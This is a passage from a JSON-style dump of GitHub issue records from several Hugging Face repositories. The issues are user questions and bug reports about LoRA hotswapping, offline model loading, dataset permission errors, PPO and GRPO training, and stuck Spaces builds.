    "body": "Hello everyone.\n\nHere is the scenario I have.\n\nI have say 10 LoRAs that I would like to load and use depending on the request. \n\nOption one:\nusing `load_lora_weights` - reads from the disk and moves to device: expensive operation\n\nOption two:\nload all loras and weights of non-used LoRAS with `set_adapters` method to 0.0. Not practical since the forward pass becomes expensive. Since all LoRAS are still loaded.\n\nOption three:\nFind an elegant way of loading LoRAs to CPU and then moving them to GPU as needed. While I was trying to do that, I saw the new parameter of hotswapping in hte load_lora_weights method. And this is what is described in the documentation:\n\n\nhotswap \u2014 (bool, optional) Defaults to False. Whether to substitute an existing (LoRA) adapter with the newly loaded adapter in-place. This means that, instead of loading an additional adapter, this will take the existing adapter weights and replace them with the weights of the new adapter. This can be faster and more memory efficient. However, the main advantage of hotswapping is that when the model is compiled with torch.compile, loading the new adapter does not require recompilation of the model. When using hotswapping, the passed adapter_name should be the name of an already loaded adapter. **If the new adapter and the old adapter have different ranks and/or LoRA alphas (i.e. scaling), you need to call an additional method before loading the adapter**\n\n\ncould someone help me out here and name the mysterious function to be called?\n\nand optionally would be great if someone could help me with my scenario.\n",
    "url": "https://github.com/huggingface/diffusers/issues/11423",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-04-26T13:44:08Z",
    "updated_at": "2025-05-26T15:03:03Z",
    "comments": 2,
    "user": "vahe-toffee"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11419,
    "title": "How to know that \"Textual inversion\" file I have loaded and not turn it on?",
    "body": "Reviewing the documentation I understand the load of IT with: \n\n# Add Embeddings\nPipeline.load_textual_inversion(\"Sd-Concepts-Library/Cat-Toy\"), \n\n# Remave All Token Embeddings\nPipeline.unload_textual_inversion()\n\n# Remove Just One Token\nPipeline.unload_textual_inversion (\"\")\n\n\nBut how do you know which are charged to the pipeline?",
    "url": "https://github.com/huggingface/diffusers/issues/11419",
    "state": "closed",
    "labels": [
      "stale"
    ],
    "created_at": "2025-04-25T17:18:07Z",
    "updated_at": "2025-05-27T18:09:45Z",
    "user": "Eduardishion"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11418,
    "title": "How to add flux1-fill-dev-fp8.safetensors",
    "body": "### Describe the bug\n\nHi!\nHow to use flux1-fill-dev-fp8.safetensors in diffusers?\n\nNow I have code:\n```\ndef init_pipeline(device: str):\n    logger.info(f\"Loading FLUX Inpaint Pipeline (Fill\u2011dev) on {device}\")\n    pipe = FluxFillPipeline.from_pretrained(\n        \"black-forest-labs/FLUX.1-Fill-dev\",\n        torch_dtype=torch.bfloat16,\n        trust_remote_code=True\n    ).to(device)\n    logger.info(\"Pipeline loaded successfully\")\n    return pipe\n```\n\nAnother try:\n```\n transformer = FluxTransformer2DModel.from_single_file(\n        \"https://huggingface.co/YarvixPA/FLUX.1-Fill-dev-gguf/blob/main/flux1-fill-dev-Q4_0.gguf\",\n        quantization_config=GGUFQuantizationConfig(compute_dtype=torch.bfloat16),\n        torch_dtype=torch.bfloat16\n    )\n\n    pipe = FluxFillPipeline.from_pretrained(\n        \"black-forest-labs/FLUX.1-Fill-dev\",\n        transformer=transformer,\n        torch_dtype=torch.bfloat16,\n        trust_remote_code=True\n    ).to(device)\n\n    pipe.enable_model_cpu_offload()\n```\n\n### Reproduction\n\nhttps://huggingface.co/boricuapab/flux1-fill-dev-fp8/blob/main/README.md\nhttps://huggingface.co/pengxian/diffusion_models/blob/main/flux1-fill-dev_fp8.safetensors\n\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nWindows 11\nPython 11\n\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11418",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-25T14:58:08Z",
    "updated_at": "2025-04-28T19:06:17Z",
    "user": "SlimRG"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2242,
    "title": "[onnx] What are the functions of the generated files by optimum-cli?",
    "body": "### System Info\n\n```shell\nI try to use **optimum-cli** to export the onnx file for llama, but i don't get a onnx file as expect, but get a lot of files, so I don't know what are they used for ?\n\n(MindSpore) [ma-user llama149]$ls onnx_model/\nconfig.json  generation_config.json  model.onnx  model.onnx_data  special_tokens_map.json  tokenizer_config.json  tokenizer.json\n\n\n> refer to https://zhuanlan.zhihu.com/p/663971402\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\n\n> (py39) [ma-user llama149]$optimum-cli export onnx --model models--daryl149--llama-2-7b-hf onnx_model --task text-generation\n\n### Expected behavior\n\nget a onnx file only, that is similar to  **torch.onnx.export**",
    "url": "https://github.com/huggingface/optimum/issues/2242",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-25T13:12:35Z",
    "updated_at": "2025-04-28T09:18:06Z",
    "comments": 1,
    "user": "vfdff"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11417,
    "title": "attributeerror: 'distributeddataparallel' object has no attribute 'dtype'. did you mean: 'type'?",
    "body": "### Describe the bug\n\nattributeerror: 'distributeddataparallel' object has no attribute 'dtype'. did you mean: 'type'?\n\n### Reproduction\n\nexport MODEL_NAME=\"black-forest-labs/FLUX.1-dev\"\nexport OUTPUT_DIR=\"trained-flux-dev-dreambooth-lora\"\n\naccelerate launch train_dreambooth_lora_flux.py \\\n  --pretrained_model_name_or_path=$MODEL_NAME  \\\n  --instance_data_dir=$INSTANCE_DIR \\\n  --output_dir=$OUTPUT_DIR \\\n  --mixed_precision=\"bf16\" \\\n  --train_text_encoder\\\n  --instance_prompt=\"a photo of sks dog\" \\\n  --resolution=512 \\\n  --train_batch_size=1 \\\n  --guidance_scale=1 \\\n  --gradient_accumulation_steps=4 \\\n  --optimizer=\"prodigy\" \\\n  --learning_rate=1. \\\n  --report_to=\"wandb\" \\\n  --lr_scheduler=\"constant\" \\\n  --lr_warmup_steps=0 \\\n  --max_train_steps=500 \\\n  --validation_prompt=\"A photo of sks dog in a bucket\" \\\n  --seed=\"0\" \\\n  --push_to_hub\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.33.0\n- Platform: Linux-5.15.0-78-generic-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.10.12\n- PyTorch version (GPU?): 2.4.0+cu121 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.30.2\n- Transformers version: 4.44.1\n- Accelerate version: 0.32.1\n- PEFT version: 0.15.2\n- Bitsandbytes version: not installed\n- Safetensors version: 0.4.2\n- xFormers version: 0.0.27.post2\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11417",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-04-25T03:30:52Z",
    "updated_at": "2025-05-25T15:02:30Z",
    "comments": 1,
    "user": "asjqmasjqm"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7536,
    "title": "[Errno 13] Permission denied: on `.incomplete` file",
    "body": "### Describe the bug\n\nWhen downloading a dataset, we frequently hit the below Permission Denied error. This looks to happen (at least) across datasets in HF, S3, and GCS.\n\nIt looks like the `temp_file` being passed [here](https://github.com/huggingface/datasets/blob/main/src/datasets/utils/file_utils.py#L412) can sometimes be created with `000` permissions leading to the permission denied error (the user running the code is still the owner of the file). Deleting that particular file and re-running the code with 0 changes will usually succeed.\n\nIs there some race condition happening with the [umask](https://github.com/huggingface/datasets/blob/main/src/datasets/utils/file_utils.py#L416), which is process global, and the [file creation](https://github.com/huggingface/datasets/blob/main/src/datasets/utils/file_utils.py#L404)?\n\n```\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \n.venv/lib/python3.12/site-packages/datasets/load.py:2084: in load_dataset\n    builder_instance.download_and_prepare(\n.venv/lib/python3.12/site-packages/datasets/builder.py:925: in download_and_prepare\n    self._download_and_prepare(\n.venv/lib/python3.12/site-packages/datasets/builder.py:1649: in _download_and_prepare\n    super()._download_and_prepare(\n.venv/lib/python3.12/site-packages/datasets/builder.py:979: in _download_and_prepare\n    split_generators = self._split_generators(dl_manager, **split_generators_kwargs)\n.venv/lib/python3.12/site-packages/datasets/packaged_modules/folder_based_builder/folder_based_builder.py:120: in _split_generators\n    downloaded_files = dl_manager.download(files)\n.venv/lib/python3.12/site-packages/datasets/download/download_manager.py:159: in download\n    downloaded_path_or_paths = map_nested(\n.venv/lib/python3.12/site-packages/datasets/utils/py_utils.py:514: in map_nested\n    _single_map_nested((function, obj, batched, batch_size, types, None, True, None))\n.venv/lib/python3.12/site-packages/datasets/utils/py_utils.py:382: in _single_map_nested\n    return [mapped_item for batch in iter_batched(data_struct, batch_size) for mapped_item in function(batch)]\n.venv/lib/python3.12/site-packages/datasets/download/download_manager.py:206: in _download_batched\n    return thread_map(\n.venv/lib/python3.12/site-packages/tqdm/contrib/concurrent.py:69: in thread_map\n    return _executor_map(ThreadPoolExecutor, fn, *iterables, **tqdm_kwargs)\n.venv/lib/python3.12/site-packages/tqdm/contrib/concurrent.py:51: in _executor_map\n    return list(tqdm_class(ex.map(fn, *iterables, chunksize=chunksize), **kwargs))\n.venv/lib/python3.12/site-packages/tqdm/std.py:1181: in __iter__\n    for obj in iterable:\n../../../_tool/Python/3.12.10/x64/lib/python3.12/concurrent/futures/_base.py:619: in result_iterator\n    yield _result_or_cancel(fs.pop())\n../../../_tool/Python/3.12.10/x64/lib/python3.12/concurrent/futures/_base.py:317: in _result_or_cancel\n    return fut.result(timeout)\n../../../_tool/Python/3.12.10/x64/lib/python3.12/concurrent/futures/_base.py:449: in result\n    return self.__get_result()\n../../../_tool/Python/3.12.10/x64/lib/python3.12/concurrent/futures/_base.py:401: in __get_result\n    raise self._exception\n../../../_tool/Python/3.12.10/x64/lib/python3.12/concurrent/futures/thread.py:59: in run\n    result = self.fn(*self.args, **self.kwargs)\n.venv/lib/python3.12/site-packages/datasets/download/download_manager.py:229: in _download_single\n    out = cached_path(url_or_filename, 
download_config=download_config)\n.venv/lib/python3.12/site-packages/datasets/utils/file_utils.py:206: in cached_path\n    output_path = get_from_cache(\n.venv/lib/python3.12/site-packages/datasets/utils/file_utils.py:412: in get_from_cache\n    fsspec_get(url, temp_file, storage_options=storage_options, desc=download_desc, disable_tqdm=disable_tqdm)\n.venv/lib/python3.12/site-packages/datasets/utils/file_utils.py:331: in fsspec_get\n    fs.get_file(path, temp_file.name, callback=callback)\n.venv/lib/python3.12/site-packages/fsspec/asyn.py:118: in wrapper\n    return sync(self.loop, func, *args, **kwargs)\n.venv/lib/python3.12/site-packages/fsspec/asyn.py:103: in sync\n    raise return_result\n.venv/lib/python3.12/site-packages/fsspec/asyn.py:56: in _runner\n    result[0] = await coro\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ \n\nself = \nrpath = '//img_1.jpg'\nlpath = '/home/runner/_work/_temp/hf_cache/downloads/6c97983efa4e24e534557724655df8247a0bd04326cdfc4a95b638c11e78222d.incomplete'\ncallback = \nversion_id = None, kwargs = {}\n_open_file = ._open_file at 0x7f27628d1120>\nbody = \ncontent_length = 521923, failed_reads = 0, bytes_read = 0\n\n    async def _get_file(\n        self, rpath, lpath, callback=_DEFAULT_CALLBACK, version_id=None, **kwargs\n    ):\n    ",
    "url": "https://github.com/huggingface/datasets/issues/7536",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-24T20:52:45Z",
    "updated_at": "2025-05-06T13:05:01Z",
    "comments": 4,
    "user": "ryan-clancy"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11396,
    "title": "How to convert the hidream lora trained by diffusers to a format that comfyui can load?",
    "body": "### Describe the bug\n\nThe hidream lora trained by diffusers can't load in comfyui, how could I convert it?\n\n### Reproduction\n\nNo\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nNo\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11396",
    "state": "closed",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-04-23T13:13:34Z",
    "updated_at": "2025-06-23T09:49:19Z",
    "user": "yinguoweiOvO"
  },
  {
    "repo": "huggingface/candle",
    "number": 2916,
    "title": "how to save and load the model",
    "body": "I  just use the varmap.save the varmap,but when I use the varmap.load then achieved a empty varmap. is there any way to save the trained model?",
    "url": "https://github.com/huggingface/candle/issues/2916",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-23T11:10:04Z",
    "updated_at": "2025-04-24T02:25:37Z",
    "user": "liguheng"
  },
  {
    "repo": "huggingface/tokenizers",
    "number": 1768,
    "title": "How to debug tokenizers with python?",
    "body": "Hi, I have a technical question. After installing transformers via pip, I successfully installed tokenizers==0.21.1 and transformers==4.49.0. When running the code:\n`tokenizer = AutoTokenizer.from_pretrained(\"../Qwen2\")  # (tokenizer configs in this folder)`\n`tokenizer.encode(data)`\nI want to trace the program flow to understand:\n\n- How tokenizers.encode_batch works internally\n- The implementation details of BPE (Byte Pair Encoding)\n\nHowever, I'm currently stuck because the code appears to be compiled into tokenizers.abi3.so, making the source code inaccessible. How can I debug or inspect these components?",
    "url": "https://github.com/huggingface/tokenizers/issues/1768",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-23T09:37:20Z",
    "updated_at": "2025-04-30T14:11:11Z",
    "user": "JinJieGan"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11390,
    "title": "Better image interpolation in training scripts follow up",
    "body": "With https://github.com/huggingface/diffusers/pull/11206 we did a small quality improvement for the SDXL Dreambooth LoRA script by making `LANCZOS` the default interpolation mode for the image resizing.\n\nThis issue is to ask for help from the community to bring this change to the other training scripts, specially for the popular ones.\n\nSince this is a really easy to make contribution I'll ask that we leave this issue for beginners and people that want to start learning how to contribute to open source projects.\n\nWhat I think are the most important ones:\n\n- [x]  [train_dreambooth_flux](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_flux.py)\n- [x] [train_dreambooth_lora](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora.py)\n- [x] [train_dreambooth_lora_lumina2](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_lumina2.py)\n- [x] [train_dreambooth_lora_sdxl](https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sdxl.py)\n- [x] [train_controlnet_flux](https://github.com/huggingface/diffusers/blob/main/examples/controlnet/train_controlnet_flux.py)\n- [x] [train_controlnet_sdxl](https://github.com/huggingface/diffusers/blob/main/examples/controlnet/train_controlnet_sdxl.py)\n- [x] [train_text_to_image](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image.py)\n- [x] [train_text_to_image_lora](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_lora.py)\n- [x] [train_text_to_image_sdxl](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_sdxl.py)\n- [x] [train_text_to_image_lora_sdxl](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_lora_sdxl.py)\n- [x] [train_dreambooth_lora_flux_advanced](https://github.com/huggingface/diffusers/blob/main/examples/advanced_diffusion_training/train_dreambooth_lora_flux_advanced.py)\n- [x] [train_dreambooth_lora_sd15_advanced](https://github.com/huggingface/diffusers/blob/main/examples/advanced_diffusion_training/train_dreambooth_lora_sd15_advanced.py)\n- [x] [train_dreambooth_lora_sdxl_advanced](https://github.com/huggingface/diffusers/blob/main/examples/advanced_diffusion_training/train_dreambooth_lora_sdxl_advanced.py)\n\nIf you have other preference, please feel free to ask me to add it.\n\nIf you want to contribute just answer to this issue with the one you want to do and tag me in the PR. Please only take one since I want to use this issue to get people to learn the ropes on how to contribute and get started with open source.",
    "url": "https://github.com/huggingface/diffusers/issues/11390",
    "state": "closed",
    "labels": [
      "good first issue",
      "contributions-welcome"
    ],
    "created_at": "2025-04-23T00:04:10Z",
    "updated_at": "2025-05-05T16:35:18Z",
    "comments": 20,
    "user": "asomoza"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1019,
    "title": "How to resume dataset creation after interruption instead of starting from scratch?",
    "body": "Recently our dataset creation + upload got interrupted due to an error not related to LeRobot. However, I have not been able to launch the dataset creation using the information already processed. My cache folder shows the data, meta, and videos folders, and I was able to determine using the episodes.jsonl file in meta folder that there were 579 episodes processed. \n\nWhen I try to resume from 580th episode, the `LeRobotDataset.create()` command gives the error that `FileExistsError: [Errno 17] File exists:` because the cache has it. How to resume it instead of having to start from scratch again?",
    "url": "https://github.com/huggingface/lerobot/issues/1019",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-22T21:30:12Z",
    "updated_at": "2025-04-22T21:45:00Z",
    "user": "Anas-7"
  },
  {
    "repo": "huggingface/peft",
    "number": 2508,
    "title": "How to save the custom module into adapter_model.safetensrs when integrating new peft method",
    "body": "Just don't know where to save and load the module, or something can mark which module need to be saved.\n\nFor example, we want a moe of lora, where multi-lora and a router will be the trainable part and need to be saved.",
    "url": "https://github.com/huggingface/peft/issues/2508",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-22T15:46:39Z",
    "updated_at": "2025-04-30T11:01:58Z",
    "user": "AaronZLT"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1015,
    "title": "How to efficiently collect and standardize datasets from multiple Gymnasium environments?",
    "body": "Hello, I am studying how to collect datasets from various Gymnasium environments for reinforcement learning and imitation learning experiments. Currently, I can collect some data from real environments, but how to collect data from Gymnasium?",
    "url": "https://github.com/huggingface/lerobot/issues/1015",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "good first issue"
    ],
    "created_at": "2025-04-22T08:50:34Z",
    "updated_at": "2025-10-17T11:16:09Z",
    "user": "ybu-lxd"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1013,
    "title": "When creating dataset, how to save_episode with existing video?",
    "body": "For video with compatible frames, height and width that is recorded/rendered elsewhere, how can I add it to an episode directly without redundant decode-encode round-trip?",
    "url": "https://github.com/huggingface/lerobot/issues/1013",
    "state": "closed",
    "labels": [
      "enhancement",
      "dataset",
      "stale"
    ],
    "created_at": "2025-04-22T04:05:10Z",
    "updated_at": "2025-12-25T02:35:25Z",
    "user": "jjyyxx"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1012,
    "title": "why chunk_size not used in PI0?",
    "body": "https://github.com/huggingface/lerobot/blob/b43ece89340e7d250574ae7f5aaed5e8389114bd/lerobot/common/policies/pi0/modeling_pi0.py#L658\n\nIs it more meaningful and reasonable here to change `n_action_steps` to `chunk_size`, since `chunk_size` means prediction action horizon and `n_action_steps` means action steps actually applied to control the robot?",
    "url": "https://github.com/huggingface/lerobot/issues/1012",
    "state": "closed",
    "labels": [
      "question",
      "policies",
      "stale"
    ],
    "created_at": "2025-04-22T03:43:38Z",
    "updated_at": "2025-11-04T02:30:18Z",
    "user": "feixyz10"
  },
  {
    "repo": "huggingface/huggingface_hub",
    "number": 3020,
    "title": "How to run apps in local mode? local_files_only is failing",
    "body": "The app is running perfectly fine when internet available\n\nAll models downloaded into \n\n`os.environ['HF_HOME'] = os.path.abspath(os.path.realpath(os.path.join(os.path.dirname(__file__), './hf_download')))`\n\nWhen i set like below\n\n```\n# Set local_files_only based on offline mode\nlocal_files_only = args.offline\nif local_files_only:\n    print(\"Running in OFFLINE mode - using local models only\")\n    # Disable any online connections for HuggingFace when in offline mode\n    os.environ['HF_HUB_OFFLINE'] = '1'\n    os.environ['TRANSFORMERS_OFFLINE'] = '1'\n    os.environ['DIFFUSERS_OFFLINE'] = '1'\n\n# Load models with local_files_only parameter when in offline mode\ntext_encoder = LlamaModel.from_pretrained(\"hunyuanvideo-community/HunyuanVideo\", subfolder='text_encoder', torch_dtype=torch.float16, local_files_only=local_files_only).cpu()\ntext_encoder_2 = CLIPTextModel.from_pretrained(\"hunyuanvideo-community/HunyuanVideo\", subfolder='text_encoder_2', torch_dtype=torch.float16, local_files_only=local_files_only).cpu()\ntokenizer = LlamaTokenizerFast.from_pretrained(\"hunyuanvideo-community/HunyuanVideo\", subfolder='tokenizer', local_files_only=local_files_only)\ntokenizer_2 = CLIPTokenizer.from_pretrained(\"hunyuanvideo-community/HunyuanVideo\", subfolder='tokenizer_2', local_files_only=local_files_only)\nvae = AutoencoderKLHunyuanVideo.from_pretrained(\"hunyuanvideo-community/HunyuanVideo\", subfolder='vae', torch_dtype=torch.float16, local_files_only=local_files_only).cpu()\n\nfeature_extractor = SiglipImageProcessor.from_pretrained(\"lllyasviel/flux_redux_bfl\", subfolder='feature_extractor', local_files_only=local_files_only)\nimage_encoder = SiglipVisionModel.from_pretrained(\"lllyasviel/flux_redux_bfl\", subfolder='image_encoder', torch_dtype=torch.float16, local_files_only=local_files_only).cpu()\n\ntransformer = HunyuanVideoTransformer3DModelPacked.from_pretrained('lllyasviel/FramePackI2V_HY', torch_dtype=torch.bfloat16, local_files_only=local_files_only).cpu()\n\n```\n\nand run with turning off internet i get below error\n\n`local_files_only = set as True`\n\n\n\n```\nRunning in OFFLINE mode - using local models only\nLoading checkpoint shards: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 4/4 [00:00<00:00, 262.52it/s]\nTraceback (most recent call last):\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connection.py\", line 198, in _new_conn\n    sock = connection.create_connection(\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\util\\connection.py\", line 60, in create_connection\n    for res in socket.getaddrinfo(host, port, family, socket.SOCK_STREAM):\n  File \"C:\\Python310\\lib\\socket.py\", line 955, in getaddrinfo\n    for res in _socket.getaddrinfo(host, port, family, type, proto, flags):\nsocket.gaierror: [Errno 11001] getaddrinfo failed\n\nThe above exception was the direct cause of the following exception:\n\nTraceback (most recent call last):\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connectionpool.py\", line 787, in urlopen\n    response = self._make_request(\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connectionpool.py\", line 488, in 
_make_request\n    raise new_e\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connectionpool.py\", line 464, in _make_request\n    self._validate_conn(conn)\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connectionpool.py\", line 1093, in _validate_conn\n    conn.connect()\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connection.py\", line 704, in connect\n    self.sock = sock = self._new_conn()\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connection.py\", line 205, in _new_conn\n    raise NameResolutionError(self.host, self, e) from e\nurllib3.exceptions.NameResolutionError: : Failed to resolve 'huggingface.co' ([Errno 11001] getaddrinfo failed)\n\nThe above exception was the direct cause of the following exception:\n\nTraceback (most recent call last):\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\requests\\adapters.py\", line 486, in send\n    resp = conn.urlopen(\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\connectionpool.py\", line 841, in urlopen\n    retries = retries.increment(\n  File \"Q:\\FramePack_v1\\FramePack\\venv\\lib\\site-packages\\urllib3\\util\\retry.py\", line 519, in increment\n    raise MaxRetryError(_pool, url, reason) from reason  # type: ignore[arg-type]\nurllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='huggingface.co', port=443): Max retries exceeded with url: /api/models/lllyasviel/FramePackI2V_HY (Caused by NameResolutionError(\": Failed to resolve 'huggingface.co' ([Errno 11001] getaddrinfo failed)\"))\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n  File \"Q:\\FramePack_v1\\FramePack\\app.py\", line 72, in \n    transformer ",
    "url": "https://github.com/huggingface/huggingface_hub/issues/3020",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-21T23:46:06Z",
    "updated_at": "2025-04-22T09:24:57Z",
    "user": "FurkanGozukara"
  },
  {
    "repo": "huggingface/finetrainers",
    "number": 378,
    "title": "How to finetune CogVideoX1.5-5B T2V LoRA?",
    "body": "Hello. I still unfamiliar with the finetuning process. I want to finetune CogVideoX1.5-5B T2V with LoRA. I have single RTX 4090. I try to re-run the bash script \"finetrainers\\examples\\training\\sft\\cogvideox\\crush_smol_lora\\train.sh\" with my own dataset and end up with error message\n`train.sh: line 130: accelerate: command not found\ntrain.sh: line 131: $'(\\r --parallel_backend accelerate\\r --pp_degree 1 --dp_degree 1 --dp_shards 1 --cp_degree 1 --tp_degree 1\\r\\r)\\r': command not found\n: No such file or directory_path THUDM/CogVideoX1.5-5B\n --dataset_config D:/TA_ucup/finetrainers/examples/training/sft/cogvideox/crush_smol_: No such file or directoryize 10\ntrain.sh: line 134: $'(\\r --dataloader_num_workers 0\\r)\\r': command not found\ntrain.sh: line 135: $'(\\r --flow_weighting_scheme logit_normal\\r)\\r': command not found\ntrain.sh: line 136: $'(\\r --training_type lora\\r --seed 42\\r --batch_size 1\\r --train_steps 3000\\r --rank 32\\r --lora_alpha 32\\r --target_modules (transformer_blocks|single_transformer_blocks).*(to_q|to_k|to_v|to_out.0)\\r --gradient_accumulation_steps 1\\r --gradient_checkpointing\\r --checkpointing_steps 1000\\r --checkpointing_limit 2\\r --enable_slicing\\r --enable_tiling\\r)\\r': command not found\ntrain.sh: line 137: $'(\\r --optimizer adamw\\r --lr 5e-5\\r --lr_scheduler constant_with_warmup\\r --lr_warmup_steps 1000\\r --lr_num_cycles 1\\r --beta1 0.9\\r --beta2 0.99\\r --weight_decay 1e-4\\r --epsilon 1e-8\\r --max_grad_norm 1.0\\r)\\r': command not found\n --validation_dataset_file D:/TA_ucup/finetrainers/examples/training/sft/cogvideox/cr: No such file or directoryon\n: No such file or directoryogvideoxeox`\nI already install the library requirements and the diffusers. Is there anything I missing?",
    "url": "https://github.com/huggingface/finetrainers/issues/378",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-21T17:17:08Z",
    "updated_at": "2025-04-24T06:24:06Z",
    "user": "MaulanaYusufIkhsanRobbani"
  },
  {
    "repo": "huggingface/trl",
    "number": 3333,
    "title": "How can I set the dataset to not shuffle? It seems there is no such option.",
    "body": "I'm using GRPOTrainer for training, and based on the logs I've printed, it seems that the dataset is being shuffled. However, the order of samples in the dataset is very important to me, and I don't want it to be shuffled. What should I do? I've checked the documentation but couldn't find any parameter to control this.",
    "url": "https://github.com/huggingface/trl/issues/3333",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-04-21T11:11:53Z",
    "updated_at": "2025-04-21T21:34:33Z",
    "user": "Tuziking"
  },
  {
    "repo": "huggingface/trl",
    "number": 3331,
    "title": "how to run multi-adapter PPO training in TRL==0.16.1 ?",
    "body": "In `TRL==0.11.0`, we can use multi-adapter  to train PPO model like:\n\n- $\\pi_\\text{sft}$ sft model as base model \n- $\\pi_\\text{sft} + \\text{LoRA}_\\text{rm}$ as reward model\n- $\\pi_\\text{sft} + \\text{LoRA}_\\text{policy}$ as policy model\n- $\\pi_\\text{sft} + \\text{LoRA}_\\text{critic}$ as value model\n\nin v0.16.0 how to run multi-adapter PPO training.",
    "url": "https://github.com/huggingface/trl/issues/3331",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb PPO",
      "\ud83c\udfcb SFT"
    ],
    "created_at": "2025-04-21T06:26:32Z",
    "updated_at": "2025-06-17T08:59:11Z",
    "user": "dhcode-cpp"
  },
  {
    "repo": "huggingface/huggingface_hub",
    "number": 3019,
    "title": "How to solve \"Spaces stuck in Building\" problems",
    "body": "### Describe the bug\n\nPublic spaces may stuck in Building after restarting, error log as follows:\n\nbuild error\nUnexpected job error\n\nERROR: failed to push spaces-registry.huggingface.tech/spaces/:cpu--: unexpected status from HEAD request to https://spaces-registry.huggingface.tech/v2/spaces/*/manifests/cpu-*-: 401 Unauthorized\n\n### Reproduction\n\n_No response_\n\n### Logs\n\n```shell\n\n```\n\n### System info\n\n```shell\nThis problem can still happen in python gradio spaces without requirements.txt\n```",
    "url": "https://github.com/huggingface/huggingface_hub/issues/3019",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-21T03:11:11Z",
    "updated_at": "2025-04-22T07:50:01Z",
    "user": "ghost"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7530,
    "title": "How to solve \"Spaces stuck in Building\" problems",
